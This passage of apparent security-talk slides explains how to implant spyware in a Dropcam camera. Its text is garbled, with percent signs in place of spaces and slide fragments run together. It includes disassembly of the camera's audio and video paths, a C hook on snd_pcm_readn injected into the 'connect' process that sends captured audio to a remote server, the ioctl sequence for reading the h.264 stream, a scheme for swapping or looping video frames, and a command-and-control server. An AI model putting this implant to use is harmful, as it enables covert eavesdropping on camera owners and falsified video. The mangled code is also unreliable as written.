 int%main()
 {% % //do%something
 % result%=%someFunction();% % printf(“result:%%#xn”,%result);% } //blah
 int%someFunction()
 {% % //do%something% % return%someInt;
 } //blah
 int%someFunction()
 {% % //do%something%EVIL% % return%someInt;
 } }same name & declaration
  • 40. > grabbing audio dropcam uses the Advanced Linux Sound Architecture (ALSA) for audio //blah
 LDR%%%%%R2,%[R11,#size]
 LDR%%%%%R0,%[R5,#0xFC]
 SUB%%%%%R1,%R11,%#cptrptrBuffer
 BL%%%%%%snd_pcm_readn% % ;read%audio!
 CMP%%%%%R0,%R2
 BEQ%%%%%readOK
 ...
 LDR%%%%%R1,%"read%from%audio%interface%failed"
 MOV%%%%%R0,%R4%%%%%%%%%%% % ;=stderr
 BL%%%%%%fprintf finally some disasm ;) get some audio snd_pcm_sframes_t%snd_pcm_readn(
 % % % snd_pcm_t*%pcm,%
 % % % void%**bufs,%
 % % % snd_pcm_uframes_t%size) “Read non interleaved frames to a PCM”
  • 41. > programmatically hooking audio //replaces%snd_pcm_readn
 //%c>captures%dropcam’s%audiosnd_pcm_sframes_t%snd_pcm_readn(snd_pcm_t%*pcm,%void%**bufs,%snd_pcm_uframes_t%size)
 {
 %%
 %%//function%pointer%for%real%snd_pcm_readn()
 %%static%snd_pcm_sframes_t%(*orig_snd_pcm_readn)(snd_pcm_t*,%void**,%snd_pcm_uframes_t)%=%NULL;
 
 %%//frames%read
 %%snd_pcm_sframes_t%%framesRead%=%0;
 
 %%//get%original%function%pointer%for%snd_pcm_readn()
 %%if(NULL%==%orig_snd_pcm_readn)
 % orig_snd_pcm_readn%=%(snd_pcm_sframes_t(*)(snd_pcm_t*,%void**,%snd_pcm_uframes_t))%=%dlsym(RTLD_NEXT,%"snd_pcm_readn");% 
 
 %%//invoke%original%snd_pcm_readn()
 %%framesRead%=%orig_snd_pcm_readn(pcm,%bufs,%size);
 
 %%//exfil%captured%audio
 %%if(framesRead%>%0)
 %%% sendToServer(AUDIO_SERVER,%AUDIO_SERVER_PORT,%bufs,%size);
 
 %%return%framesRead;
 
 } injected into connect process
  • 42. > grabbing video dropcam talks to a propriety Ambarrella kernel module to access the h.264 encoded video stream :/ //blah
 LDR%%%%%R0,%"/dev/iav"
 MOV%%%%%R1,%#2%%%%%%%%%%;%oflag
 MOV%%%%%R2,%#0
 BL%%%%%%open send ioctl to video driver open video device //blah
 MOV%%%%%R0,%R5%%%%%%%%%%
 LDR%%%%%R1,%=0x40046540%% ;%ioctl
 MOV%%%%%R2,%#0xD
 BL%%%%%%ioctl
 CMP%%%%%R0,%#0
 LDRLT%%%R0,%"IAV_IOC_START_ENCODE_EX"
 BLT%%%%%printError undocumented struct :/ //blah
 MOV%%%%%R3,%#1
 MOV%%%%%R0,%R5%%%%%%%%%%;%fd
 LDR%%%%%R1,%=0x80046537%;%request
 ADD%%%%%R2,%SP,%#0x120+var_D8
 STRB%%%%R3,%[R8]
 BL%%%%%%ioctl
 CMP%%%%%R0,%#0
 LDRLT%%%R0,%=aIav_ioc_read_b%;%"IAV_IOC_READ_BITSTREAM_EX"
 BLT%%%%%printError
  • 43. > grabbing video open the /dev/iav device map BSB memory via IAV_IOC_MAP_BSB ioctl map DSP memory via IAV_IOC_MAP_DSP ioctl get the streams state via IAV_IOC_GET_ENCODE_STREAM_INFO_EX ioctl then check that its IAV_STREAM_STATE_ENCODING finally, read the stream via the IAV_IOC_READ_BITSTREAM_EX ioctl get the h.264 parameters via IAV_IOC_GET_H264_CONFIG_EX ioctl
  • 44. > manipulating video (conceptually) connect’s-process spaceinjected module
  • 45. > manipulating video (example) size and pointer to frame allows the malicious code to swap out frames on the fly….or just replay one(s) to loop the video stream! IAV_IOC_READ_BITSTREAM_EX-ioctl
  • 46. > cuckoo’s egg C&C server
  • 47. > cuckoo’s egg C&C server status/result command data
  • 49. > creditz images: dropcam.com 
 icons: iconmonstr.com flaticon.com